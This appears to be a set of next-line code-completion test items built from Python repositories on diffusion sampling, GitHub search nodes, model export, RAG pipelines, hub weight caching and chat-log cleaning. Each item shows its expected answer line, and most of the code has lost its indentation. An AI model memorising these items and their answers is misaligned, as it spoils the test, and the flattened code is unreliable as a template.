pred_x0 = (pred_max - pred_min) * pred_x0 + pred_min # orig range
return pred_x0
# Path: extern/ldm_zero123/models/diffusion/sampling_util.py
def spatial_norm_thresholding(x0, value):
# b c h w
s = x0.pow(2).mean(1, keepdim=True).sqrt().clamp(min=value)
return x0 * (value / s)
# Path: extern/ldm_zero123/modules/diffusionmodules/util.py
def extract_into_tensor(a, t, x_shape):
b, *_ = t.shape
out = a.gather(-1, t)
return out.reshape(b, *((1,) * (len(x_shape) - 1)))
# Path: extern/ldm_zero123/modules/diffusionmodules/util.py
def make_ddim_sampling_parameters(alphacums, ddim_timesteps, eta, verbose=True):
# select alphas for computing the variance schedule
alphas = alphacums[ddim_timesteps]
alphas_prev = np.asarray([alphacums[0]] + alphacums[ddim_timesteps[:-1]].tolist())
# according the the formula provided in https://arxiv.org/abs/2010.02502
sigmas = eta * np.sqrt(
(1 - alphas_prev) / (1 - alphas) * (1 - alphas / alphas_prev)
)
if verbose:
print(
f"Selected alphas for ddim sampler: a_t: {alphas}; a_(t-1): {alphas_prev}"
)
print(
f"For the chosen value of eta, which is {eta}, "
f"this results in the following sigma_t schedule for ddim sampler {sigmas}"
)
return sigmas, alphas, alphas_prev
# Path: extern/ldm_zero123/modules/diffusionmodules/util.py
def make_ddim_timesteps(
ddim_discr_method, num_ddim_timesteps, num_ddpm_timesteps, verbose=True
):
if ddim_discr_method == "uniform":
c = num_ddpm_timesteps // num_ddim_timesteps
ddim_timesteps = np.asarray(list(range(0, num_ddpm_timesteps, c)))
elif ddim_discr_method == "quad":
ddim_timesteps = (
(np.linspace(0, np.sqrt(num_ddpm_timesteps * 0.8), num_ddim_timesteps)) ** 2
).astype(int)
else:
raise NotImplementedError(
f'There is no ddim discretization method called "{ddim_discr_method}"'
)
# assert ddim_timesteps.shape[0] == num_ddim_timesteps
# add one to get the final alpha values right (the ones from first scale to data during sampling)
steps_out = ddim_timesteps + 1
if verbose:
print(f"Selected timesteps for ddim sampler: {steps_out}")
return steps_out
# Path: extern/ldm_zero123/modules/diffusionmodules/util.py
def noise_like(shape, device, repeat=False):
repeat_noise = lambda: torch.randn((1, *shape[1:]), device=device).repeat(
shape[0], *((1,) * (len(shape) - 1))
)
noise = lambda: torch.randn(shape, device=device)
return repeat_noise() if repeat else noise()
# Path: extern/ldm_zero123/models/diffusion/ddim.py
from functools import partial
from tqdm import tqdm
from extern.ldm_zero123.models.diffusion.sampling_util import (
norm_thresholding,
renorm_thresholding,
spatial_norm_thresholding,
)
from extern.ldm_zero123.modules.diffusionmodules.util import (
extract_into_tensor,
make_ddim_sampling_parameters,
make_ddim_timesteps,
noise_like,
)
import numpy as np
import torch
"""SAMPLING ONLY."""
class DDIMSampler(object):
def __init__(self, model, schedule="linear", **kwargs):
super().__init__()
self.model = model
self.ddpm_num_timesteps = model.num_timesteps
self.schedule = schedule
def to(self, device):
"""Same as to in torch module
Don't really underestand why this isn't a module in the first place"""
for k, v in self.__dict__.items():
if isinstance(v, torch.Tensor):
new_v = getattr(self, k).to(device)
setattr(self, k, new_v)
def register_buffer(self, name, attr):
if type(attr) == torch.Tensor:
if attr.device != torch.device("cuda"):
attr = attr.to(torch.device("cuda"))
setattr(self, name, attr)
def make_schedule(
self, ddim_num_steps, ddim_discretize="uniform", ddim_eta=0.0, verbose=True
):
| self.ddim_timesteps = make_ddim_timesteps( |
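A worked instance of the "uniform" branch of make_ddim_timesteps above, including the +1 shift applied to steps_out (the step counts are illustrative).

import numpy as np

num_ddpm_timesteps, num_ddim_timesteps = 1000, 10
c = num_ddpm_timesteps // num_ddim_timesteps
ddim_timesteps = np.asarray(list(range(0, num_ddpm_timesteps, c))) + 1
print(ddim_timesteps)  # [  1 101 201 301 401 501 601 701 801 901]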
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: YORG-AI/Open-Assistant
# Path: package/src/yorgassistant/core/nodes/base_node.py
class BaseNode(ABC):
config: NodeConfig
func_mapping: dict[str, Callable]
def __init__(self):
# initialize func_mapping
self.func_mapping = {}
avail_funcs = [
func_name for func_name in dir(self) if not func_name.startswith("_")
]
for func_name in self.config.functions.keys():
if func_name not in avail_funcs:
raise Exception(
f"Node {self.config.name} does not contain {func_name} method."
)
else:
self.func_mapping[func_name] = getattr(self, func_name)
def run(self, input: NodeInput):
if input.func_name not in self.func_mapping.keys():
raise Exception(
f"Node {self.config.name} does not contain {input.func_name} method."
)
else:
return self.func_mapping[input.func_name](input.func_input)
# Path: package/src/yorgassistant/core/nodes/base_node.py
class NodeConfig(BaseModel):
name: str = Field(description="Node 名称")
description: str = Field(default="", description="Node 描述")
functions: dict[str, str] = Field(default={}, description="Node 所有功能描述")
# Path: package/src/yorgassistant/core/nodes/github/github_node.py
class GithubNode(BaseNode):
def __init__(self):
self.token = os.environ.get("GITHUB_TOKEN") # Retrieving the token from the environment
if not self.token:
raise ValueError("GITHUB_TOKEN is not set in the environment.")
self.g = Github(self.token) # Initializing the GitHub instance with the token
super().__init__()
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchCodeInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchCommitsInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchIssuesAndPRsInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchLabelsInput(BaseSearchInput):
repository_id: int
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchRepositoriesInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchTopicsInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_model.py
class SearchUsersInput(BaseSearchInput):
sort: str = None
order: str = None
# Path: package/src/yorgassistant/core/nodes/github/github_search.py
from ..base_node import BaseNode, NodeConfig
from .github_node import GithubNode
from .github_model import (
SearchCodeInput,
SearchCommitsInput,
SearchIssuesAndPRsInput,
SearchLabelsInput,
SearchRepositoriesInput,
SearchTopicsInput,
SearchUsersInput,
)
github_search_node_config = {
"name": "github_search",
"description": "A node for searching various entities on GitHub.",
"functions": {
"search_code": "Search code.",
"search_commits": "Search commits.",
"search_issues_and_prs": "Search issues and pull requests.",
"search_labels": "Search labels.",
"search_repositories": "Search repositories.",
"search_topics": "Search topics.",
"search_users": "Search users.",
},
}
| class GithubSearchNode(GithubNode): |
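The functions-to-methods dispatch that BaseNode builds in func_mapping above, reduced to a runnable toy; the class and method names here are invented for illustration.

class ToyNode:
    def __init__(self, functions):
        # Map each declared function name to the bound method of the same name.
        self.func_mapping = {}
        avail = [f for f in dir(self) if not f.startswith("_")]
        for name in functions:
            if name not in avail:
                raise Exception(f"ToyNode does not contain {name} method.")
            self.func_mapping[name] = getattr(self, name)

    def greet(self, who):
        return f"hello {who}"

node = ToyNode({"greet": "Say hello."})
print(node.func_mapping["greet"]("world"))  # hello world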
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: zju3dv/4K4D
# Path: easyvolcap/utils/data_utils.py
def to_numpy(batch, non_blocking=False, ignore_list: bool = False) -> Union[List, Dict, np.ndarray]: # almost always exporting, should block
if isinstance(batch, (tuple, list)) and not ignore_list:
batch = [to_numpy(b, non_blocking, ignore_list) for b in batch]
elif isinstance(batch, dict):
batch = dotdict({k: to_numpy(v, non_blocking, ignore_list) for k, v in batch.items()})
elif isinstance(batch, torch.Tensor):
batch = batch.detach().to('cpu', non_blocking=non_blocking).numpy()
else: # numpy and others
batch = np.asarray(batch)
return batch
# Path: easyvolcap/utils/net_utils.py
def save_npz(model: nn.Module,
model_dir: str = '',
epoch: int = -1,
latest: int = True,
):
from easyvolcap.utils.data_utils import to_numpy
npz_path = join(model_dir, 'latest.npz' if latest else f'{epoch}.npz')
state_dict = model.state_dict() if not isinstance(model, DDP) else model.module.state_dict()
param_dict = to_numpy(state_dict) # a shallow dict
os.makedirs(dirname(npz_path), exist_ok=True)
np.savez_compressed(npz_path, **param_dict)
log(yellow(f'Saved model {blue(npz_path)} at epoch {blue(epoch)}'))
# Path: scripts/realtime4dv/charger.py
from os.path import join
from easyvolcap.utils.console_utils import *
from easyvolcap.utils.data_utils import to_numpy
from easyvolcap.utils.net_utils import save_npz
from easyvolcap.scripts.main import test # will do everything a normal user would do
from easyvolcap.engine import cfg
from easyvolcap.engine import SAMPLERS
from easyvolcap.runners.volumetric_video_runner import VolumetricVideoRunner
import sys
import torch
import argparse
# This function will try to invoke evc programmatically
@catch_throw
def main():
# fmt: off
sys.path.append('.')
sep_ind = sys.argv.index('--')
our_args = sys.argv[1:sep_ind]
evv_args = sys.argv[sep_ind + 1:]
sys.argv = [sys.argv[0]] + ['-t','test'] + evv_args
parser = argparse.ArgumentParser()
parser.add_argument('--sampler', type=str, default='SuperChargedR4DVB')
parser.add_argument('--sub_sampler', type=str, default='SuperChargedR4DV')
parser.add_argument('--exp_name', type=str, default='scr4dvb_dance3')
parser.add_argument('--save_fp32', action='store_true')
parser.add_argument('--save_pt', action='store_true')
parser.add_argument('--no_save_npz', action='store_false', dest='save_npz')
args = parser.parse_args(our_args)
# You have to save at least one type of model
| assert args.save_pt or args.save_npz |
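The state-dict → numpy → npz round trip performed by save_npz above, as a stand-alone sketch (toy module; the file is written to the working directory).

import numpy as np
import torch
import torch.nn as nn

model = nn.Linear(4, 2)
# Convert every tensor in the state dict to a numpy array, then compress.
param_dict = {k: v.detach().cpu().numpy() for k, v in model.state_dict().items()}
np.savez_compressed("latest.npz", **param_dict)
loaded = np.load("latest.npz")
print(loaded.files)  # ['weight', 'bias']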
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: pchunduri6/rag-demystified
# Path: subquestion_generator.py
def generate_subquestions(
question,
file_names: List[str] = None,
system_prompt=DEFAULT_SUBQUESTION_GENERATOR_PROMPT,
user_task=DEFAULT_USER_TASK,
llm_model="gpt-4-0613",
):
"""Generates a list of subquestions from a user question along with the
file name and the function to use to answer the question using OpenAI LLM.
"""
FilenameEnum = Enum("FilenameEnum", {x.upper(): x for x in file_names})
FilenameEnum.__doc__ = f"The names of the file to use to answer the corresponding subquestion - e.g. {file_names[0]}"
# Create pydantic class dynamically
QuestionBundle = create_model(
"QuestionBundle",
question=(
str,
Field(
None, description="The subquestion extracted from the user's question"
),
),
function=(FunctionEnum, Field(None)),
file_name=(FilenameEnum, Field(None)),
)
SubQuestionBundleList = create_model(
"SubQuestionBundleList",
subquestion_bundle_list=(
List[QuestionBundle],
Field(
None,
description="A list of subquestions - each item in the list contains a question, a function, and a file name",
),
),
__base__=OpenAISchema,
)
user_prompt = f"{user_task}\n Here is the user question: {question}"
few_shot_examples = [
{
"role": "user",
"content": "Compare the population of Atlanta and Toronto?",
},
{
"role": "function",
"name": "SubQuestionBundleList",
"content": """
{
"subquestion_bundle_list": [
{
"question": "What is the population of Atlanta?",
"function": "vector_retrieval",
"file_name": "Atlanta"
},
{
"question": "What is the population of Toronto?"
"function": "vector_retrieval",
"file_name": "Toronto"
}
]
}""",
},
{
"role": "user",
"content": "Summarize the history of Chicago and Houston.",
},
{
"role": "function",
"name": "SubQuestionBundleList",
"content": """
{
"subquestion_bundle_list": [
{
"question": "What is the history of Chicago?",
"function": "llm_retrieval",
"file_name": "Chicago"
},
{
"question": "What is the history of Houston?",
"function": "llm_retrieval",
"file_name": "Houston"
}
]
}""",
},
]
response, cost = llm_call(
model=llm_model,
function_schema=[SubQuestionBundleList.openai_schema],
output_schema={"name": SubQuestionBundleList.openai_schema["name"]},
system_prompt=system_prompt,
user_prompt=user_prompt,
few_shot_examples=few_shot_examples,
)
subquestions_list = json.loads(response.choices[0].message.function_call.arguments)
subquestions_pydantic_obj = SubQuestionBundleList(**subquestions_list)
subquestions_list = subquestions_pydantic_obj.subquestion_bundle_list
return subquestions_list, cost
# Path: openai_utils.py
def llm_call(
model,
function_schema=None,
output_schema=None,
system_prompt="You are an AI assistant that answers user questions using the context provided.",
user_prompt="Please help me answer the following question:",
few_shot_examples=None,
):
kwargs = {}
if function_schema is not None:
kwargs["functions"] = function_schema
if output_schema is not None:
kwargs["function_call"] = output_schema
messages = []
if system_prompt is not None:
messages.append({"role": "system", "content": system_prompt})
if few_shot_examples is not None:
messages.extend(few_shot_examples)
if user_prompt is not None:
messages.append({"role": "user", "content": user_prompt})
response = completion_with_backoff(
model=model,
temperature=0,
messages=messages,
**kwargs
)
# print cost of call
call_cost = llm_call_cost(response)
print(f"🤑 LLM call cost: ${call_cost:.4f}")
return response, call_cost
# Path: complex_qa.py
import os
import requests
import warnings
import evadb
from dotenv import load_dotenv
from pathlib import Path
from subquestion_generator import generate_subquestions
from openai_utils import llm_call
warnings.filterwarnings("ignore")
if not load_dotenv():
print(
"Could not load .env file or it is empty. Please check if it exists and is readable."
)
exit(1)
def generate_vector_stores(cursor, docs):
"""Generate a vector store for the docs using evadb.
"""
for doc in docs:
print(f"Creating vector store for {doc}...")
cursor.query(f"DROP TABLE IF EXISTS {doc};").df()
cursor.query(f"LOAD DOCUMENT 'data/{doc}.txt' INTO {doc};").df()
evadb_path = os.path.dirname(evadb.__file__)
cursor.query(
f"""CREATE FUNCTION IF NOT EXISTS SentenceFeatureExtractor
IMPL '{evadb_path}/functions/sentence_feature_extractor.py';
""").df()
cursor.query(
f"""CREATE TABLE IF NOT EXISTS {doc}_features AS
SELECT SentenceFeatureExtractor(data), data FROM {doc};"""
).df()
cursor.query(
f"CREATE INDEX IF NOT EXISTS {doc}_index ON {doc}_features (features) USING FAISS;"
).df()
print(f"Successfully created vector store for {doc}.")
def vector_retrieval(cursor, llm_model, question, doc_name):
"""Returns the answer to a factoid question using vector retrieval.
"""
res_batch = cursor.query(
f"""SELECT data FROM {doc_name}_features
ORDER BY Similarity(SentenceFeatureExtractor('{question}'),features)
LIMIT 3;"""
).df()
context_list = []
for i in range(len(res_batch)):
context_list.append(res_batch["data"][i])
context = "\n".join(context_list)
user_prompt = f"""You are an assistant for question-answering tasks.
Use the following pieces of retrieved context to answer the question.
If you don't know the answer, just say that you don't know.
Use three sentences maximum and keep the answer concise.
Question: {question}
Context: {context}
Answer:"""
| response, cost = llm_call(model=llm_model, user_prompt=user_prompt) |
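Note: `llm_call` above depends on `completion_with_backoff` and `llm_call_cost`, neither of which is defined in this excerpt. The sketch below shows one common shape for such a retry wrapper; it is a minimal sketch assuming the tenacity library and the legacy `openai` (<1.0) client, not the actual implementation in openai_utils.py.

import openai
from tenacity import retry, stop_after_attempt, wait_random_exponential

# Hypothetical completion_with_backoff: the real definition is not shown in
# this excerpt, so the tenacity-based retry policy here is an assumption.
@retry(wait=wait_random_exponential(min=1, max=60), stop=stop_after_attempt(6))
def completion_with_backoff(**kwargs):
    # Retry transient API failures (rate limits, timeouts) with jittered
    # exponential backoff, giving up after six attempts.
    return openai.ChatCompletion.create(**kwargs)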
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: predibase/lorax
# Path: server/lorax_server/utils/sources/source.py
class BaseModelSource:
def remote_weight_files(self, extension: str = None):
raise NotImplementedError
def weight_files(self, extension: str = None):
raise NotImplementedError
def download_weights(self, filenames: List[str]):
raise NotImplementedError
def download_model_assets(self):
""" The reason we need this function is that for s3
we need to download all the model files whereas for
hub we only need to download the weight files. And maybe
for other future sources we might need something different.
So this function will take the necessary steps to download
the needed files for any source """
raise NotImplementedError
# Path: server/lorax_server/utils/sources/source.py
def try_to_load_from_cache(
repo_cache: Path, revision: Optional[str], filename: str
) -> Optional[Path]:
"""Try to load a file from the Hugging Face cache"""
if revision is None:
revision = "main"
if not repo_cache.is_dir():
# No cache for this model
return None
refs_dir = repo_cache / "refs"
snapshots_dir = repo_cache / "snapshots"
# Resolve refs (for instance to convert main to the associated commit sha)
if refs_dir.is_dir():
revision_file = refs_dir / revision
if revision_file.exists():
with revision_file.open() as f:
revision = f.read()
# Check if revision folder exists
if not snapshots_dir.exists():
return None
cached_shas = os.listdir(snapshots_dir)
if revision and revision not in cached_shas:
# No cache for this revision and we won't try to return a random revision
return None
# Check if file exists in cache
cached_file = snapshots_dir / revision / filename
return cached_file if cached_file.is_file() else None
# Path: server/lorax_server/utils/sources/hub.py
import time
import os
from datetime import timedelta
from loguru import logger
from pathlib import Path
from typing import Optional, List
from huggingface_hub import HfApi, hf_hub_download
from huggingface_hub.constants import HUGGINGFACE_HUB_CACHE
from huggingface_hub.utils import (
LocalEntryNotFoundError,
EntryNotFoundError,
RevisionNotFoundError, # Import here to ease try/except in other part of the lib
)
from .source import BaseModelSource, try_to_load_from_cache
WEIGHTS_CACHE_OVERRIDE = os.getenv("WEIGHTS_CACHE_OVERRIDE", None)
def get_hub_model_local_dir(model_id: str) -> Path:
object_id = model_id.replace("/", "--")
repo_cache = Path(HUGGINGFACE_HUB_CACHE) / f"models--{object_id}"
return repo_cache
def weight_hub_files(
model_id: str, revision: Optional[str] = None, extension: str = ".safetensors"
) -> List[str]:
"""Get the weights filenames on the hub"""
api = HfApi()
info = api.model_info(model_id, revision=revision)
filenames = [
s.rfilename
for s in info.siblings
if s.rfilename.endswith(extension)
and len(s.rfilename.split("/")) == 1
and "arguments" not in s.rfilename
and "args" not in s.rfilename
and "training" not in s.rfilename
]
if not filenames:
raise EntryNotFoundError(
f"No {extension} weights found for model {model_id} and revision {revision}.",
None,
)
return filenames
def weight_files(
model_id: str, revision: Optional[str] = None, extension: str = ".safetensors"
) -> List[Path]:
"""Get the local files"""
# Local model
if Path(model_id).exists() and Path(model_id).is_dir():
local_files = list(Path(model_id).glob(f"*{extension}"))
if not local_files:
raise FileNotFoundError(
f"No local weights found in {model_id} with extension {extension}"
)
return local_files
try:
filenames = weight_hub_files(model_id, revision, extension)
except EntryNotFoundError as e:
if extension != ".safetensors":
raise e
# Try to see if there are pytorch weights
pt_filenames = weight_hub_files(model_id, revision, extension=".bin")
# Change pytorch extension to safetensors extension
# It is possible that we have safetensors weights locally even though they are not on the
# hub if we converted weights locally without pushing them
filenames = [
f"{Path(f).stem.lstrip('pytorch_')}.safetensors" for f in pt_filenames
]
if WEIGHTS_CACHE_OVERRIDE is not None:
files = []
for filename in filenames:
p = Path(WEIGHTS_CACHE_OVERRIDE) / filename
if not p.exists():
raise FileNotFoundError(
f"File {p} not found in {WEIGHTS_CACHE_OVERRIDE}."
)
files.append(p)
return files
repo_cache = get_hub_model_local_dir(model_id)
files = []
for filename in filenames:
| cache_file = try_to_load_from_cache( |
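For readers tracing the prediction target: `weight_files` ends at the predicted line above. A plausible continuation of the loop — inferred from the surrounding code and the imports at the top of hub.py, not copied from the repository — resolves each filename through the local cache and fails fast when a file is missing:

    # Inferred continuation of weight_files (assumption, not verbatim code);
    # it restates the loop head already shown above for readability.
    for filename in filenames:
        cache_file = try_to_load_from_cache(repo_cache, revision, filename)
        if cache_file is None:
            # The weights are not cached yet; raise a descriptive error
            # rather than returning a partial list of files.
            raise LocalEntryNotFoundError(
                f"File {filename} of model {model_id} not found in "
                f"{HUGGINGFACE_HUB_CACHE}. Please download the weights first."
            )
        files.append(cache_file)
    return files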
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: codefuse-ai/Test-Agent
# Path: chat/server/monitor/basic_stats.py
NUM_SERVERS = 14
# Path: chat/server/monitor/clean_battle_data.py
def to_openai_format(messages):
roles = ["user", "assistant"]
ret = []
for i, x in enumerate(messages):
ret.append({"role": roles[i % 2], "content": x[1]})
return ret
# Path: chat/server/monitor/clean_battle_data.py
def replace_model_name(old_name):
return (
old_name.replace("bard", "palm-2")
.replace("claude-v1", "claude-1")
.replace("claude-instant-v1", "claude-instant-1")
.replace("oasst-sft-1-pythia-12b", "oasst-pythia-12b")
)
# Path: chat/utils.py
def detect_language(text: str) -> str:
"""Detect the langauge of a string."""
import polyglot # pip3 install polyglot pyicu pycld2
from polyglot.detect import Detector
from polyglot.detect.base import logger as polyglot_logger
import pycld2
polyglot_logger.setLevel("ERROR")
try:
lang_code = Detector(text).language.name
except (pycld2.error, polyglot.detect.base.UnknownLanguage):
lang_code = "unknown"
return lang_code
# Path: chat/server/monitor/clean_chat_data.py
import argparse
import datetime
import json
import os
import time
from pytz import timezone
from tqdm import tqdm
from chat.server.monitor.basic_stats import NUM_SERVERS
from chat.server.monitor.clean_battle_data import (
to_openai_format,
replace_model_name,
)
from chat.utils import detect_language
"""
Clean chatbot arena chat log.
Usage:
python3 clean_chat_data.py --mode conv_release
"""
NETWORK_ERROR_MSG = (
"NETWORK ERROR DUE TO HIGH TRAFFIC. PLEASE REGENERATE OR REFRESH THIS PAGE.".lower()
)
def get_log_files(max_num_files=None):
dates = []
    for month in [4, 5, 6, 7, 8]:
        for day in range(1, 32):
            dates.append(f"2023-{month:02d}-{day:02d}")
filenames = []
for d in dates:
for i in range(NUM_SERVERS):
name = os.path.expanduser(f"~/fastchat_logs/server{i}/{d}-conv.json")
if os.path.exists(name):
filenames.append(name)
max_num_files = max_num_files or len(filenames)
# filenames = list(reversed(filenames))
filenames = filenames[-max_num_files:]
return filenames
def clean_chat_data(log_files):
raw_data = []
for filename in tqdm(log_files, desc="read files"):
        for retry in range(5):
            try:
                lines = open(filename).readlines()
                break
            except FileNotFoundError:
                time.sleep(2)
        else:
            # All retries failed; skip this log file instead of hitting an
            # unbound `lines` below.
            continue
for l in lines:
row = json.loads(l)
if row["type"] == "chat":
raw_data.append(row)
all_models = set()
all_ips = dict()
chats = []
ct_invalid_conv_id = 0
ct_invalid = 0
ct_network_error = 0
for row in raw_data:
if "conv_id" not in row["state"]:
ct_invalid_conv_id += 1
continue
conversation_id = row["state"]["conv_id"]
if conversation_id is None:
ct_invalid_conv_id += 1
continue
state = row["state"]
| conversation = to_openai_format(state["messages"][state["offset"] :]) |
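As a closing illustration of the helper invoked in the predicted line, here is a small, self-contained usage of `to_openai_format` (the sample conversation is hypothetical, not drawn from the logs):

# Each stored message is a (role_label, text) pair; to_openai_format keeps
# only the text and alternates "user"/"assistant" roles by position.
sample = [
    ("USER", "What is the capital of France?"),
    ("ASSISTANT", "The capital of France is Paris."),
]
print(to_openai_format(sample))
# [{'role': 'user', 'content': 'What is the capital of France?'},
#  {'role': 'assistant', 'content': 'The capital of France is Paris.'}]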